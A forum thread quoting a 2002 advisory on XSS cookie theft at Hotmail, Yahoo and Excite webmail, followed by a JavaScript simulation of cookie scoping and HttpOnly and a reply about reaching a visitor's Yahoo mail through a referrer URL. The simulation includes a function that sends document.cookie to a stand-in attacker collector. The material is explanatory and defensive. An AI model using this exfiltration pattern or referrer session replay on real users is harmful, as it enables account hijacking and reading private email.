#1
This is an excerpt from an article I found at: www.dsinet.org

"-------------------------------------------------------
XSS/Cookie problems at major (webmail) sites Advisory
-------------------------------------------------------

XSS/Cookie problems at major (webmail) sites
13/11/02 - by "N|ghtHawk" Thijs Bosschert (nighthawk_at_hackers4hackers.org)

----------------------
Introduction:
----------------------

After finding an XSS/Cookie bug in the lycos.com mail site[0], I wondered if it was the only site with those problems. I found out that more sites have the same problem. This advisory gives three other sites to show the problem, and explains what the problem is.

----------------------
Vendor Information:
----------------------

Homepage                  : http://www.hotmail.com
Vendor informed about bug : -
Mailed advisory           : 11/11/02
Vendor response           : none (yet?)
Status                    : Cookie capturing still possible

Homepage                  : http://www.yahoo.com
Vendor informed about bug : 03/11/02
Mailed advisory           : 03/11/02
Vendor response           : none (yet?)
Status                    : Cookie capturing still possible

Homepage                  : http://www.excite.com
Vendor informed about bug : 11/11/02
Mailed advisory           : 11/11/02
Vendor response           : 1 autoreply
Status                    : Cookie capturing still possible

----------------------
Affected Versions:
----------------------

Tested on:
- hotmail.com webmail
- yahoo.com webmail
- excite.com webmail

Not tested on:
- Other MSN/Passport services
- Other yahoo services
- Other excite services

----------------------
Description:
----------------------

What is Hotmail?
-------------
- http://www.hotmail.com -
Hotmail is the world's largest provider of free, Web-based e-mail. It is based on the premise that e-mail access should be easy and possible from any computer connected to the World Wide Web. Hotmail eliminates the disparities among e-mail programs by adhering to the universal Hypertext Transfer Protocol (HTTP) standard. Sending and receiving e-mail from Hotmail is easy: go to the Hotmail Web site at http://www.hotmail.com or click the Hotmail link at http://www.msn.com, sign in, and send an e-mail message. By using a Web browser as a universal e-mail program, Hotmail lets you stay connected anywhere in the world.

What is Yahoo?
-------------
- http://www.yahoo.com/ -
"Yahoo currently provides users with access to a rich collection of resources, including, various communications tools, forums, shopping services, personalized content and branded programming through its network of properties (the "Service")."
- http://mail.yahoo.com -
"Yahoo! Mail is one of the Internet's most popular free e-mail services. Access your e-mail account from anywhere. With Yahoo! Mail, you have access to your email from any Internet-connected computer in the world. Whether you are at a cafe, in a library, at work or at home, with Yahoo! Mail, your email address is the same and your account is accessible from all locations."

What is Excite?
-------------
- http://www.excite.com -
Excite is a multi-purpose service which allows you to use or access a wealth of products and services, including e-mail, search services, chat rooms and bulletin boards, shopping services, news, financial information and a broad range of other content (collectively the "Excite Service").

----------------------
Vulnerability:
----------------------

All of the above named sites use cookies with their mail services. These sites also have more than one service, and the different services have different hostnames/servers. The problem with this is that by finding an XSS bug in one of the many services, an XSS request can be made to get the cookie of the mail service.

----------------------
Exploit:
----------------------

The XSS bugs can be exploited by letting people click a link in an email. Other ways to exploit this are:
- Giving people links through instant messengers.
- Putting javascript in any homepage, which will open the XSS bug. Can be exploited for example in:
  - Poorly filtered forums
  - Poorly filtered guestbooks
- Giving people a URL which will redirect them to the XSS bug.

And people can think of other ways as well; actually it isn't really safe to surf on the internet with a webmail account if the servers aren't fully secure.

All the links above go to a perl script. This script (rompigema.pl) will get the cookie and the referrer of the 'victim', then it will make a request to the server to get the frontpage, inbox or an email of the 'victim'.

----------------------
Patch:
----------------------

Well, it's up to the sites to patch this. It would be a good idea not to put insecure scripts on a server which uses the same cookies as your mail system. Also I really think an idea like HttpOnly[1] would be a good start in getting rid of all the XSS bugs."

As always: watch out what you click,
Pieter
__________________
Regards, Pieter
It's nice to be important, but it's more important to be nice.
It's human to make mistakes. It's even more so to blame the computer for it.
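The advisory's core point is cookie scope, not any one XSS bug: if the mail session cookie is set for the parent domain, every sibling host under it (a guestbook, a forum, a redirector) receives that cookie, and a script injected on any of those hosts can read it through `document.cookie` and ship it off to something like the rompigema.pl collector described above. The example below is added here and is not code from the advisory or from any of the named sites; it models browser cookie matching (RFC 6265 domain-match rules) and `document.cookie` visibility in plain JavaScript so the weak and hardened configurations can be compared offline. All hostnames, the cookie name `MAILSESS`, and the collector URL are made up for illustration.

```javascript
// Added example, not from the advisory: how a parent-domain cookie leaks to a
// sibling host's injected script, and what host-only scoping plus HttpOnly
// change. Hostnames, cookie names and URLs below are constructed.

// Parse one Set-Cookie header value (as sent by originHost) into a record.
function parseSetCookie(header, originHost) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    domain: originHost.toLowerCase(), // no Domain attribute => host-only
    hostOnly: true,
    path: '/',
    httpOnly: false,
  };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    switch (k.toLowerCase()) {
      case 'domain':
        cookie.domain = v.toLowerCase().replace(/^\./, '');
        cookie.hostOnly = false;
        break;
      case 'path':
        cookie.path = v || '/';
        break;
      case 'httponly':
        cookie.httpOnly = true;
        break;
    }
  }
  return cookie;
}

// RFC 6265 domain matching: a host-only cookie matches exactly one host;
// a domain cookie matches the domain itself and every subdomain of it.
function domainMatches(cookie, host) {
  host = host.toLowerCase();
  if (cookie.hostOnly) return host === cookie.domain;
  return host === cookie.domain || host.endsWith('.' + cookie.domain);
}

// What the browser would put in the Cookie header of a request to host.
function cookiesSentTo(jar, host) {
  return jar.filter(c => domainMatches(c, host)).map(c => `${c.name}=${c.value}`);
}

// What document.cookie exposes to a script running on host: the same set,
// minus anything flagged HttpOnly.
function documentCookie(jar, host) {
  return jar
    .filter(c => domainMatches(c, host) && !c.httpOnly)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// The URL an injected script would request to exfiltrate what it can read
// (the collector is a made-up stand-in for the advisory's rompigema.pl).
function exfilUrl(jar, host, collector) {
  return collector + '?c=' + encodeURIComponent(documentCookie(jar, host));
}

// Weak: the mail session cookie is scoped to the whole parent domain and
// is readable by script.
const weakJar = [
  parseSetCookie('MAILSESS=s3cret; Domain=.example.com; Path=/', 'mail.example.com'),
];

// Hardened: host-only (no Domain attribute) and HttpOnly.
const hardenedJar = [
  parseSetCookie('MAILSESS=s3cret; Path=/; HttpOnly', 'mail.example.com'),
];

// Compare what a script on a poorly filtered sibling host can see in each case.
function demo() {
  const xssHost = 'guestbook.example.com';
  return {
    weakSeen: documentCookie(weakJar, xssHost),
    weakExfil: exfilUrl(weakJar, xssHost, 'http://attacker.invalid/collect'),
    hardenedSeen: documentCookie(hardenedJar, xssHost),
    hardenedSentToMail: cookiesSentTo(hardenedJar, 'mail.example.com'),
  };
}

console.log(demo());
```

Two things worth noticing in the output: host-only scoping alone already stops the guestbook host from receiving the cookie at all, and HttpOnly additionally hides it from `document.cookie` even for a script injected on the mail host itself, while the mail server still receives it on every request. HttpOnly does not remove the XSS bug; it only removes cookie theft as its easiest payoff.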
#2
Hmm, I don't know about this vulnerability, but once I managed to access the webmail of a visitor who visited my site from an email in his mailbox; following the referrer allowed me to access his email account. I didn't even realise what was happening until then, because I have the habit of randomly checking unfamiliar referrers.
It was Yahoo mail. I'm guessing this is a problem for most web-based emails, especially if the user does not log out properly and it hasn't timed out. I've read about it before, but to see it actually happen was an eye-opener to say the least.